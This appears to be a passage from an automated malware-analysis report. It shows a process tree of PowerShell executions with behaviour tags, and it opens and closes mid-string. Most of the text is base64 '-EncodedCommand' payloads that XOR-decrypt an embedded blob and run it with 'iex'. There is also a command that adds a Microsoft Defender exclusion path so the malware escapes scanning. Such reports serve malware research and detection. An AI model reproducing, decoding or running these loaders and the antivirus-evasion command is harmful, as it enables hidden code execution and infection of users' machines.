BnAG4AKQA7ACQAbQBrAGkAawBiAHMAYQByAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHUAZgBkAGQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAdQBmAGQAZABbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHEAbwBrAGwAZABwAFsAJABpACUAJABxAG8AawBsAGQAcAAuAEwAZQBuAGcAdABoAF0AfQApACkAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABtAGsAaQBrAGIAcwBhAHIAKQApAHwAaQBlAHgA
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Packages'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -EncodedCommand JABoAHAAcgBmAGQAZAB5AGoAPQAnAGYAUgBFAGQAUgBTADUAMQBEADAAYwBTAGYAbAA4AEUAZgBoADEAdgBTAFIAZwBjAEMAMABZAFQAQwBtAEYAYwBWAFEAcABxAGUAaABWADYAQwAwAEkAVABWAEYAOABBAFUAZwBwAHEAZgB5AHgAQQBLAFEAWQBwAEMAMQA5AEgAYgBnADQAbwBXAHgAawBmAEsAUQBZAHEAZgBnAG8ARABWAEcAawB6AFIAUgBWADYAYwBFAE0AUgBZAFcARQBGAGIAdwAwAHcARwBCADAAZgBFADAATQBoAEMAbQBWAEoAVgBEAFEASgBXAHkAdAB1AEkAZwBNADgAVQBnAFoAWQBWAFEANABLAEcAUQBCAFUARgB3AE0AVABjAFUATgBCAGYAaAAxAHYAUwBSADAAZgBFADAATQA4AGIAMwAxAGEAVgBoADQASgBSAFMAdAA2AFAAUgA4AHEAZgAyAEYAWQBWAEcAcwBzAFMAUwBsAHUAQgB5AGMAcQBiAGsAdABjAGIAbQBvAE8AVwBoAHMAZgBEAHcASQBxAGIAbgAwAEEAZgBoAHAAdQBhAEMAcABsAEIAeABzAFMAVgBHAEYAaABWAEQAUgBtAFcAUgBWADEARAAwAE0AVgBhAG4ARgBsAGIAZwBFAFIAWABCAHAAcQBBADAATQBSAGUAbgBKAEUAWQBRADUAcQBYAGkAeAAxAEUAeAA4AC8AUQAwAEIAYgBVAHgANAB6AFEAaQA1AFUAQgBFAG8ANQBmAEEAWgBjAFUAeQBCAHUAZgBoAFoAQQBOAFIAOABwAEMAbQBKAFgAWQBtAG8AegBWAEMAdABxAEUAdwBjADgAVgBYAGwAWQBWAFQAUQBOAFcAQwAxADUATgBrAFEANgBmAGsATgBFAFYAQgA0AEcAUwBSADkAKwBCAEIAZwBTAFYAMgBWAEQAVgBSADAAcwBHAFEAVgBxAEwAUgA0AHEAVgAwAE4ARQBVAHkAQQBlAEYAdwBaAHUARgB3AFkAVQBiAGsAdABEAGUAQwBNAHMAUgBTAHgAcQBGAHcAbwBWAGYAbgBsAEoAZgBoADEAdgBTAFEAVgBxAGMARQBJAFMAZgBrAFEASABlAEcAbwA3AFEAUwA1ADYAUABSADgANQBlAGwAUgBiAFYAZwBFAGQARwBDADUARQBjAEQAYwBTAEMAbQBWAEYAVQB4AG8AZQBXAGgAVQBlAEYAQgBRADkAZQBuAEoARQBiAGcANQBxAFIAUQBaAHUAZABBAFkAUwBDAG0ASgBYAGYAUgA0AHYAVwBpAHgAcQBIAEEATQA1AGMAVQBBAEgAZgBSADQAMwBRAHgAVgBEAE4AUQBjAFUAUQBIAEkASgBmAGgAbwBOAFgAaQB4AGwATgBRAEkAbgBRAEcARQBBAFYAZwA0AEoAWABBAE4ARwBjAEIAOABWAGMAVwBKAGYAZQBoAG8AbwBTAFEAVgBxAEsAUQBRAFYAVgBGAHgARgBaAG0AdABtAEgAeQAxAEQARgBBAE0AbwBiAFUAQQBIAGYAUgBFADcAUgBTAHAANgBLAFEAbwBwAEMAbAB0AGIAZgBoADEAdgBTAFIAMABmAEUAMABNADgAYgAzADEAYQBWAGgANABKAFIAUwB0ADYAUABSADgAcQBmADIARgBZAFYARwBzAHMAUwBRAE4ANwBGAHgAcwBUAEMAMABkAGgAYgBnAEUATgBRAFEAWgB1AEYAeAB3AHEAVgBHAGsARwBWAFEARQA4AEcAUQBBAGYASwBSADQANQBlAGwAUgBiAFUAMgBzAE4ARwB5ADUAMQBEAHgAawBWAGYAbQBKAEYAWgBtAHQAbQBIAHkAMQBEAEYAQgBRADgAYgBsAGMAQQBmAGgAMABlAFgAZwBaAGwATgBrAFEANgBmAGsATgBFAFYAQgA0AEcAUwBSADkAKwBCAEIAZwBVAEMAMgBFAEYAVgBnAEUAVgBSAEMAcABxAEYAeABFADYAYwBXAEYAQQBiAFEANABzAFcAeAB0AEEARQAwAGMAVQBlAGwAUgBIAGUAeABvAGUAUgBTAHMAZgBGADAAWQBSAFkAWABsAGEAVQBoADQATwBXAHgANABmAGYARQBJAFMAVgAyAEoAQQBiAHcAMABzAEcAUQBWAGwAQgB4AGcAVABWADEAdABaAFYARABBAGUARgB3AFoAcQBLAFIANAA1AGUAbABSAGIAVgBqAFIAdQBXAFIAVgBFAGMARABZAHEAWQBYADEAYQBWAEQAUQB6AFcAUwB0AHEASwBRAFUAUwBVAEYAaABYAFUAaQBBAGUAUgBTADUAQQBkAEEAUQBxAFUAQQBaADEAYgBRAEUAUgBSAEMAeABBAEsAUQBRAFUAZgBsADkARwBWAFQAQQBkAEYAdwBaAHEARQB3AEEAVABDADIAWgBYAFUAaQBBAGUAUQBIAHQAYwBCAGoASQA2AFEASABFAEoAZQBDAE0AcgBGAHcAWgBxAEUAdwBBAFQAQwAyAFoAWABVAGkATQBzAFIAUwA1ADEAQgAwAFUAUgBVAEgASQBKAGYAaABvAE4AWABpAHgAbABOAFEASQA1AGMAVQBSAFgAWQBXAHMAMwBRAGkAeABBAEUAQQBjAGsAQwAzAGwAQgBiAFEANABSAEgAZwBaAGwATgBoAFEANgBmAHcAdABYAGUAdwA1AHEAUQBnAFoAdQBGAHgAdwBxAFYARwBrAEcAVgBRAEUAOABTAFMAbAA1AE4AawBRAFcAYgBVAGMASgBlAEcAcwB6AFEAdwBaAHUASQBoAGcAUgBWAEEASgBIAGIAVABBADAAUwBTAHAAWABOAGgAZwBTAGIAawBkAEgAVgBUAGMASgBSAEMANABmAEwAaABRAGcAYQBuAEYALwBiAFEARQA4AFcAaABvAGYAQwB4AHcAcQBiAG0ARQBCAFYAUgA0AEoAUgBSAGwAcQBBAHcAawBSAEMAWABWAGEAVQB4ADQAegBXAEMAMQBFAEIAQQBjAGkAWQBWAHQAYwBiAG0AbwBKAEgAaABWACsAQgBCADAAaABRADAATgBUAFkAUQBFAFIAUQBpAHgARABDAHgAQQBoAGIAbQBGAEUAVgBnADUAcQBUAFIANQAxAEIAdwBRAGkAZgBuAFUAQQBiAGcAOABuAFkAeQAwAGYAQwB4AHMAUwBmADAAdABoAGIAZwA0AFIAWABCAFoANgBJAFIAOABUAEMARQB0ACsAVgBnADQAUgBWAHkAMABlAEMAdwBVAHEAVgAyAEoARgBZAEEANQBtAEgAeQB4AEIAQgB4AHcAUwBDAHcAWgBjAGIAeQBNAFIASABSAFYANgBNAFUAWQBwAFUAMwBaAEgAZQBCADQAVgBSAHkAcwBmAEUAeABBAFMAQwBuAEUAQQBiAHgAOAB6AFcAQwB0ADEARAB5AEkAUgBmAGcAcABGAGIAUQBwAHEAUQBpAHAAcQBFAEIAMAAvAFEAMABCAGIAVQBnADQAVgBHAHkANQA2AEsAUQBvAHEAYQBuAEkASgBmAGgAbwAzAFoAaABWADEARgBBAGMAaQBmAG4AVQBBAGIAUQBvADAAVwB4ADUANgBGAHgAZwBpAGYAbgBVAEYAVgBDAEEANABWAGcAUgArAGMARABZAHAAWQBXAEYAYwBlAHoASQBaAFIAUgBWAG8ATABRAFUAVQBZAFgAbABLAGYAQgAwAGEASABRAFIAKwBjAEQARQBxAGYAbQBGACsAVgBnADUAcQBIAHkAdABxAEUAdwBrADcAZgBYADUASwBmAEEAMABzAEcAUQBWAGwATgBRAGMAUgBWAEcAcABYAFoAdwBvAGQAWQBSAFYAMQBKAGcAYwBsAEMAMwAxAGYAYgBRADQATgBIAHkAMQBxAEUAeABnAG0AZgBuAFYASwBWAG0AZwBOAFYAeQA1ADYASQBSADAAcQBZAFgAcABYAGUAdwB3AE4AUgBpADUANgBQAFUAWQA1AGUAZwBKAHkAVQB4AG8AZQBSAFMAcAA2AEQAMABZAFIAYgBsADkASgBiAFEAMABzAEcAUQBWAHEARAB3AFUAcQBmAG0ARgBEAGIAaQBBAGUARgB3AFoAbwBjAEIAOABVAFEAQQBKAGsAYgBtAHMAMwBRAGgAVgBsAEUAdwBBAHEAYgBtAEYAbABiAGcARQBSAFgAQgBwAGwARAB3AE0AUwBWAEgAMQBBAFYAQgA0AFoAWABRAFoAdQBkAEMAVQBUAEMAMgBWAEoAWgBBADQATwBTAFEAVgBsAEIAeABnAFIAWQBYAGsARQBWAFIANAB6AEcAZwBaAHUAZABEADQAUwBDADEAZABHAFYAVABVAE4ARwB5AHgAcQBFAEIAUQBqAGIAZwBZAEEAYgBRAEUAVgBSAGgAWQBlAEYAdwBNAFUAVgBHAFoAWABlAHcAOABWAEgAeQAxAEcAUABSADgAVQBWAEcAVgBEAGYAaAB3ADMAWABoAFUAZgBMAFIAOABUAEMAbQBJAEgAZQBDAEEATgBYAHkAeAA2AGMARQBBAFYAVQBIAEkASgBmAGgAeABxAFEAaQB0AFUAZABDAGMAcABDADEAdABjAGIAUgBFAEoAWABSAFYANgBGAHkAWQBwAFkAWAAxAEMAWQBtAHMASgBIAGkAdABxAEsAUQBZAHEAQwBuADEAawBiAFEARQBPAFMAUQBOADQAQQB3AEEAUwBmAGcAbwBEAFkAbQBvAE4AUgBpAHgARABGAHoAawBxAFUAZwBwAEYAWgBqAFEAWgBIAGkAdABxAEUAdwBvAFIAYgBtAFYASwBmAGgAcAB1AGEAeQAwAGYAYwBFAE0AbABDAG0ARgBHAFYAQgB3AHoAUQB4ADAAZgBmAEEATQBTAFYARgBkAGcAVgBUAEkAVgBSAGkAdABsAEYAeAA4AFQAVgBGADkAYwBWAEMAQQBlAFcAaABvAGUARgB4AHMAVABWADIARgBvAFYAaAA0AEoAVwB4ADUAMQBIAHgAcwBSAGIAawB0AFkAYgBqAFEAbgBRAGcAWgB1AGQARABvAFIAYgBtAEYAYgBiAFEANQByAEcAUQBCAFUARgB3AEkAVABiAGcAWQBEAFUAagBCAHEAYQBDAHAAcQBFAHgAawBVAFkAVwBGAEEAVgBXAHQAcQBlAHkANQA2AGQAQgA4AGsAZgBsADkARQBWAGcARQBPAFMAUgA5ACsAQgBCADAAbABmADIASgBIAFkAaQBBADgARwBRAEIAVQBGAHcASQBUAGIAZwBZAEQAVQBqAEIAcQBiAEMAMQBxAFAAUQBVAFUAQwBWAHQAWQBWAEQAUQBOAGUAeABWADEARAB3AGMAUgBiAGcAWgBZAFUAeAA0AEsAUwBSADkAKwBCAEIAZwBxAFYASABWAEQAVgBHAHMASwBHAFEAQgBVAEYAdwBJAFQAYgBnAFkARABVAGoAQgBxAGYAUgBWADEAQwAwAE0AcABZAFgAawBBAFoAQQA1AHEASABoAFYAMQBEADAARQBwAGIAawBSAFgAWgB3AG8AZQBRAEIAcAByAEYAQQBrADkAZgBBAE4AZQBlAEMATQBzAFIAUwA1AEQAQQB3AFkAVQBDAGwAeABGAFkAagBRAEoAVgBDAHQAcQBBAHcAbwBVAGYASAAxAEcAVQB3ADUAcQBIAGcAWgBwAGQAUgBRACsAZgBWAFEASABlAEMAQQBOAFgAeQB4ADYAYwBFAEEAVgBVAEEAWgBrAFUAeAA0AFoAVgB5AHQAcgBJAFIAdwBxAGIAZwBaAHkAVQB6AFEAWgBYAGkAMQBxAEEAeABvAFMAZgBtAFoAWABaAHcAbwBlAFIAUwB0AGwARAAwAEkAcQBiAFUAQQBIAGYAUgA0AHYAVgBpADEARABJAFUAVQA4AFYAVgBkAFkAVgBtAHMASgBlAHkAMABjAEQAMABJAFMAVQBIAEkASgBmAGgAbwBOAEgAaQB4AEQARQB4ADgALwBRADAAQgBiAFYAagBjAFoAVwB5AHMAZQBLAGcAWQBoAGIAawB0AEQAVgBXAG8ANwBhAHgAVgA2AGQAQgBzAFMAVgBHAEYAawBVAHgANABaAFYAeQB0AHUAQgBFAG8ANQBlAG0ARgBkAGIAZwA0AG4AVgBCAFYANQBOAGsAUQA2AGMAVQBOAEIAVgBnAEUAegBIAFEAWgBwAGQAUgBRADUAVQBHAEoAZgBmAFIANAB2AFcAaQB4AHEASABBAFkAbQBmAG4AVgBLAFYAbQBsAHEAUgBpADEANgBFAEEATgBFAFMASABCAHgAZgBqAE0AcwBHAFIAcABBAEUAeAAwAFIAWQBYADAAQQBiAFEARQBXAFcAaABvAGYAQwB4AHcAcQBiAG0ARQBCAFYAUgA0AEoAUgBSAGwAcQBBAHcAawBSAFEASABKAEUAWgBnADQAUgBIAGkANQA2AGYAQQBZADUAZQBtAEYARQBWAG0AbwBkAFcAeQB0ADYAQwB3AEUAUgBhAG4ASgBFAFkAUgBFAFYAWABoAFUAZgBJAFIAOABUAFUASABKAGIAVQBqAFIAdQBYAHgAVgBFAEIAQQBjAGwAYwBYAGwAQQBWAFQAUQBSAFgAaQB4AHEAQQB3AEEANQBlAG0ARgBaAFYAVwBzAE4AUgBTADEAcQBDAEIAUQA4AGIAMwAxAGMAVQB4AEUATgBYAGkAMQBBAEkAUQBrADUAZQBtAEYAQgBWAEEANQBxAEgAUwBwAEUAQgBBAGMAbQBmAG4AVgBLAFYAbQBsAHEAUgBpADEANgBFAEIAUQA2AGMAVQBOAEIAVgBnAEUAegBIAFEAWgB1AGQAQwBZAHAAWQBYADEAQwBZAGgANABaAEgAaQA1AHUAQgBCAGcAUgBmAG0AbABkAFUAagBSAHUASABRAFoAdQBkAEQAWQBxAFkAWAAxAGEAVgBEAFEAegBXAFMAdABxAEsAUQBVAFMAVQBIAEoAYgBWAEIANABOAFYAeQBwAHEARAB3AG8ANQBlAGcASgAzAFYAVwBvAFYAUgBCAFYANQBOAGsAUQBXAGEAQQA0AE4AJwA7ACQAbAB3AG0AbABxAGYAPQAnADcAWQBfAC4ATwAtAEUAcwBwADkAMwAwACcAOwAkAHUAYQBlAG0APQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABwAHIAZgBkAGQAeQBqACkAOwAkAGsAZABvAHgAZwA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB1AGEAZQBtAC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAHUAYQBlAG0AWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABsAHcAbQBsAHEAZgBbACQAaQAlACQAbAB3AG0AbABxAGYALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawBkAG8AeABnACkAKQB8AGkAZQB4AA==
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -EncodedCommand JABiAHUAdwBsAHEAcwBqAGQAPQAnAE8AdwA4AFkAVgB3AHMARABiAEQAZwBoAEkAVgBZAHkASgBuAFkAKwBVAGcAdABuAEIAeQBZAEsATgBsAE0AQgBLAHgAQQArAFYAZwBzADUATwBYAG8ATgBOAGwATQBFAEUAaQBvAGMARQBqAEYAbQBPAFQAMAB4AE0AaABFAGcASgAzAFUAYwBFAGoASQBUAGIASABrAEwAVgBRAG8AKwBLAHgAQgBGAFYAdwBrAE0AQgAzADgAdwBNAFEAbABqAEkAMwBVAG0AVgB6AGwAbgBBAHoATQBMAEMARABBAGcARgBRAFEAWABGAHkAUQAvAFkAQwBJAEsATQBqAE4AaQBQAGoANABpAFYAZwBzADUAWQBIAGcATgBQAFQAUQBtAE8AQQBOAEEAQQBEAHAAbQBBADMAbwBrAE0AeQBnAC8ARQBBAEEAbQBEAEEAdwBEAEwAUwBZAHkASQB6AFEAOQBFAG4AVQBEAEEAQQA0AFgARgB4ADQAeQBNAGgANAA1AEsASABRAGgARQB6AHgAbQBIAHoAcwB5AE0AaQBoAGwATwBBAFIAQgBJAFEAMABjAEYAeQBJAEsAQwBEAFEARQBFAGkAcABKAEUARABJAE0ASAAzAG8ATgBOAGkAUQBBAEsAQgA4ACsARgBUADAAVABFADMAbwBKAEoAaQBjAGgASgB4AEIARgBGAHcAcwBNAEEAeQBZAG4ASAB4AFUAKwBLAEgAVQBFAFYAdwB3ADYATgBpADAANABOAGkAUQBhAEsAeAA4AFQARQB6AHgAbQBIAHoAcwB5AE0AaQBoAGwATwBBAEUAKwBVAGcAdABuAEIAeQBZAEsATgBsAE0ARwBLAEIAQgBGAEQAQQBwAG0AWgBYADAAbgBIAEQAUQA3AEUAaQBvADYAQwBRAGwAbgBQAFMAQQBoAEkAVgBZAHkATwB3AEIARgBWAGcAbwBUAEkAbgAwAG4ASABEAFEAOABFAGgAQQBjAEQAaQBFAFEAWgBTADAAaQBJAGwATgBrAEUAdwBBAEgAVQBDAGMAdABCAHoAdwBKAFYAaABZADUASwAzAFUAMgBGAFMARQBRAFoAUwAwAGkASQBsAE4AawBFAHcAQQBIAFUAQwBkAG4ATQBTAFUASgBNAGgANAA1AE8AQQBRAFgARABBAHcATQBIAHoAOABNAEMAdwBwAGwARQB3AFIARgBJAHcAcABuAEEAegA4AE0ASgBpAGMAaABLADMAUQBoAEEAQwBVAFgARgBEADQAeABNAGwATQArAE8AQQBSAEIARQBnAHAAbgBCAEMAMABpAEkAZwBJAHMASwBDAG8AVQBGAFEAMABUAEcARABvAGgATABSAFYAaQBPAHcAQQA2AEgAdwBrAEQASABDADAANABOAGkAYwArAEYAUgA4ADYARQBnAHcANgBPAFgAbwBLAEkAeABVACsASwBIAFUARQBWAHcAdwA2AE4AagA4ADgAQwBEAEIAaABGAFEAUQBYAEUAQwBRAFgARgBDAEUATQBQAFMAdwBnAEYAUwBrAGMAVgB3AG8AWABZAEEANABLAFYAagBBAGcARgBRAFEAYwBBAHkAYwB1AEoAaQBFAEwATABUAFEANgBLAHgAOAA1AEEARABnAEgARgB3AEkAeQBQAFQAYwBoAEoASABVACsAQwBEAEkARABCADMAcwBLAEkAagBBACsASgB3AEEAMgBIAFEAawB0AEYARAA0ACsASQBpAEEAdgBFAEgAWQB5AEQAdwB3AFQATQBpADAAaQBJAGkAdwB0AEUAQgBBADUAVQBDAGQAbQBPAFMAYwBoAEoAZwBFACsARQBnADgAaQBDAEQASQBNAEgARAA4ADUAVgAxADkAawBFAHkAawBoAEEAQwBRAEQATQBYAG8AaABJAFMAYwBsAE8AQQA4AEQAVQBDAEkAVABNAFQATQB4AEMAQQBJAG4ARgBBAEEAOQBBAEQAZwBIAEYAQwBFAEwATABUAFEANgBLAHgAOAA2AEIAUwBJAFQARwB6AGcATQBMAFQAeABtAFAAUwB4AEYAQwB3ADAAYwBCAEMAVQBsAEoAaABFAHkATwB3ADgAeQBWAHcAawBUAEEAegBNAGsARABpAGcAagBGAFIAQgBGAFYAeQBNAEMAWgBYADAAbgBIAEQAUQBqAEUASABRAEEAQwB6AEoAbQBFAHoAZwBoAEkAVgBZAHkARQBCAEEAcABBAEMATQBYAEIAeQBRAEwAQwBDAHcANwBFAEgAUQBZAEQAUwBRAC8AQgB5AFkATABWAHkAZwBzAEUAQgA4AHkAVgB3AGsARABiAEQAOABqAE4AaQBSAGkATwBBAFEAaQBDAFEAcwA1AEgAeQBRAEoAVgBnADQALwBQAFMAdwBpAEMAdwB0AG0ARwB6AE0ASgBQAFMAUgBsAEUAQgBCAEoARQBpAEUAYwBaAFMAMAB5AE0AaAA0AHYASwB4AFEAeQBVAEMARQBYAE0AeQBNAEgATABDAGMANwBPAEEAOQBBAFUAQQA0AEgARgB5AFkASwBMAFMAZwA1AE8AQQA4AEQAVQBDAEkAYwBBAHoATQBLAEMAegB4AGcARgBRAEEASABBAEQAZwBIAEYAQwBFAE0AUABTAHcAZwBGAFMAawBjAFYAdwBvAFgARgAzAEkAaABJAHcASQA2AEsAeAA4ADYAQwB5AFEAQgBiAEMATQBKAEMARABBAC8ARgBRAFEAeQBVAEMARQBYAEIAeQB3AGgASgBsAGMAZwBLAHgAUQB4AEQARABFADYARQB6AG8AeABEAEMAUgBzAFAAbgBSAEEAVQBBADQAQQBJAFQAbwB5AEQAQwBjADYATwB3AEEAVQBIAGoARQA1AE0AVABnAE4ASQBpAHMAbABPAEEAOABEAFUAQwBJAFQAUABUAEEATABDAEEAMAB5AEkAUgBRAHkASwBEAEkATQBOAGoANAA5AFYAeQBnADYASwB4AEEAaQBWAGcAbwBUAEEAeQBFACsASQBpAEEAdgBFAEgAYwAyAEQAUQB3AFQATwBUAHcASwBEAEMAYwBoAEkAeAA4AFkAQwB6AEYAbgBBADMAbwB5AE4AaQBjADcASQBEADAAQQBCAEQANABNAEcAeQBZAEwAQwB5AGcAMgBJAEIAQQBpAEUAdwBrAEQAWQBDAGsANQBQAFMAUQBpAEkAdwBBADIAVgB6AEUAQwBMAFEAYwBLAFYAeQBnADkARQB3AEUASQBOAGoARQBEAEcAegBnAHgATQBnAEkANQBFAG4AWQBJAEsAUQBrAEQARwB6AE0ASwBWAGkAZwBqAEsAeQBrAGgARQBqADgAVABIAHoAdwBOAEkAeQBnAGkASwB4AEEAbQBEAFEAawBTAEIAegB3ACsASQBqAEIAaABGAFEASgBKAFYAVABJAE0ASAB6AGsAeABQAFEAbwB6AFAAaAA4AFUAQwB3AGwAbgBPAFMATQBsAFYAeQBOAGgASwBDAG8ANgBWAEQASQBDAEwAUwBFAHgAUABUAFEAMgBKAGcAQQA2AEUAUQAwAFMARwB6ADAAeQBNAGoAQQAvAEUAQQBFAGkARQBUADQAVABBADMANABNAEkARgA5AG4ASwB4ADgANgBGAEQARQBNAFAAagA4AHkAUABRADQANQBPAHoAMABEAFUAQwBJAGMARgB5AFkASwBDAEEASQBzAE8AQQBOAEEAQQBEAHcANQBBADMAawBrAE0AeQBnAC8ARQBBAEEAbQBEAEEAdwBEAEwAUwBZAHkASQB6AFEAOQBFAG4AVQBFAE0AZwBzADUATwBTAFEAeQBWAHoAQQBzAE8AQQBSAEIASgBRAHcAUgBMAFQAdwB5AFYAMQA4AGcAUABqADAARABEAEEAcwBUAEEAegA4AHkAVgBpADgAZwBJAHcAQQBtAEYARABFAE0AUABpADAANABOAGkAYwA3AEoAQQBFAGgASABTAFUAUwBHAEMAUQBuAEgAeABVACsARgBRAEEANgBFAHcAcwA1AE8AVAAwAEwATgBpAGQAcwBPAEEASgBGAEMAdwB3AHQAWgBCADQAeABWAHcANAA1AEsAdwA4AG0ARgBEAEkARABCAHgAOAB4AFAAUwBnAG4ASgB3ADgANgBGAHoASgBtAE0AUwBZAEwARABDAGMAaABJAEIAOABpAE0AdwB3AFQARQB6AE0ATQBMAFQAQQBpAFAAagAwAEQARABBAHcAVABIAHoANABMAEMAQQBvAGkARQBoAFIARgBJAGoASQBEAEwAUwBJAE4ATgBpAGQAcwBPAEEAUQBVAE4AagA0AFEARQB3AFEAaQBIAHgAVgBpAE8AdwA4AFUARgBEAEkATQBHAEMAMAA0AE4AaQBRAGEASwB4ADgAVABFAHoAMQBtAEcAeQBVAHkATQBqAFIAawBFAHcAQQBtAEQARAA0AFQARQB6AEEASgBWAEMAUQBzAEUAQgBCAEYARABRAGsATQBGAHkASQBLAEoAaQBjAGgASgB4ADgAKwBDAHcAcwAvAE8AUwBFAGgASgBqAFIAaABGAFEAOAAyAEUAUQBrAHQARgBEADQAOABJAGwAOAA3AEUAMwBWAEYATQBnADAATQBGAHkAWQBoAEkAQQBvAGcARgBRAEEAbQBIAGoARQBEAEcAMwBvAEoAUABUAHcANQBPAEEAUgBCAE4AQQB3AEQAWQBBAGMAeQBQAFQAdwA1AEUAdwBRAHkATABnAGsARABNAFMAVQB5AFAAUwBoAGwAUABqADAARABEAEEAcwA2AFAAWABzAEsATQBqAHcAOABPAEEATgBBAEEARAB3ADUAQQAzAGsAawBNAHkAZwAvAEUAQQBBAG0ARABBAHcARABMAFMAWQB5AEkAegBRADkARQBuAFUARQBNAHoASQBNAEIAMwBvAEoATQBsAE0ANwBFAG4AWQArAEMAdwB3AFgARgBEADQANQBNAGgANABtAEUAMwBRAFUATQB3AHcAVABFAHoATQBNAEkAQQBvADQASgBYAFYARgBKAEQARQBNAEIAMwBvAHkAUABTAHcAbABLAHgAOAA5AEEAQwBRAEIAQgB6AHcASwBDAHoAUQBCAEYAUQBCAEoARQBEAHMARABEAHcASQBLAFYAdwBvAGcASwAzAGQASgBFAGoAawA1AEUAMwBvAE0ASQBqAEEAcwBFAEIAQQBtAEgAUwBFAFgAWgBCADQATQBJAGkAQQBzAEYAUQBFAFUAQwBEAEkARABZAEEAZwBNAEMAQwBBAGwARQB3AEEAMgBEAGcAbwBUAEEAQwAwAGsATQBBADQAbABLAHcAQQBpAEMAdwBvACsASgBuADAAaQBMAFMAeABoAEYAUgBCAEIAQwBqAEUAOQBZAEEAdwBOAEkAagBBAC8ARgBSADgAaQBGAHcAcABtAFkAQgA4AEoATQBsAGMANQBKAFEAQQBjAEUAdwBrAE0AQgBDADAANABOAGkAYwA3AEoAQQBFAGgARQBEADAAdABOAG4AMABuAEgARABRAHMARgBBADgAbQBFAHoASQA1AEgARAA4ADUATQBoADQAbQBFADMAUQBVAEwAagBFAE0ASAB5AEUAKwBJAGoAQQBzAEUAeABBAGMARQBqAEUATQBCAHkAWQBoAEkAVgBZAHkATwB3AEEAcQBEAHcAbwBjAEcAeQBZAG4ASAB4AFUAKwBFAGkAawBZAFYAZwBvAEQARAB5AE0AawBDAFMAdwA1AEUAbgBRAGkARAB3AHMANgBCAHcAQQBLAEMAegBRADUARQBpAGsAcQBEAHcAbwBYAEYASABNAGgASgBnAEkARQBKAHcATQAxAFYAagB3AEgATgBuADAAbgBIAEQAUQBzAEYAQQA4AG0ARQB6AEkANQBIAEQAOAA5AEMARABBAHYARgBRAEEAMgBIAGcAdwBSAEcAegB3AE0ATQBsAE4AbABPAEEATgBBAEEAQwBVAEEARgBIADAAbgBIAEQAUQBzAEYAQQA4AG0ARQB6AEkANQBIAEQAOAA1AE0AaAA0AG0ARQAzAFEAVQBJAGoASQBEAFoAQwBJAEsAQwBEAFEAQgBGAFEAQQAyAEgAZwB3AFgARgBIAE0AaABKAGoAUQA0AEsAQgBBAEkASABUAEkAQQBKAG4AMABpAEwAUwB4AGgARgBSAEIAQgBDAGoARQA5AFkAQgA0AE0ASQBpAEEAcwBGAFEARQBVAEMARABJAEQAWQBBAGcATQBDAEMAQQBsAEUAdwBBADIARABnAG8AVABBAEMAMAA0AE4AaQBjACsARgBRADgANgBWAGoASQBBAEoAbgAwAGkATABTAHgAaABGAFIAQgBCAEMAagBFADkAWQBCAEkAeABNAGgASQA1AEoAdwBCAEoATgBBAHcARABZAFMAMAA0AE4AaQBjACsARgBRADgANgBWAGoASQBBAEoAbgAwAGkASQBoAFoAZwBLAEgAUQAyAEMAagBJADUAYgBTADAANABOAGkAYwA4AE8AdwBRAFgARABEAEoAbgBIAHkATQB5AFYAeABKAGgASwBEADUARgBNAGoARQBNAEcAegBnADgAQwBDAEEAaABLAHgAUQBlAEQAZwBjAGQARgBDAE0AbgBIAHgASgBsAEUAaQBrAGIAQQBBADAAdQBKAGkARQBNAFAAUwBoAGoASwBDADQAeABYAGkARQBTAEgAeQBZAHkAVgB3AG8AdgBGAFEAQQBtAEgAaQBRAEMARwB5AEEASgBJAGoAQQArAEYAUgBBAEkAQwB6AEkAUwBCAHkASQBMAFYAeABVAHkAUABSAEkAMgBEAFEAdwBUAE8AVAB3AEsARABDAGMAKwBFAEEAOAArAEgAZwBrAEgARgBEADQAKwBMAFMAdwBsAEsAMwBVAFUAQwB3AHMAOQBGAHcAcwBqAEoAagBRAGkASwB4AEIARgBDAFEAcwA5AEkAaQAwAGkATABUAFEAOABFAHgAOAA2AEYAdwBzAGMARQBEAG8AaABKAGwAYwBFAEUAaQBvAGMARQBqAEYAbQBPAFQAMAB4AE0AaABFAHkATwB3ADgAVQBGAEQASQBNAEcAQwAwAGsATQB5AGcANQBGAFEAOABpAEYAdwBvADUATQBUAEEAaABKAGoAUQ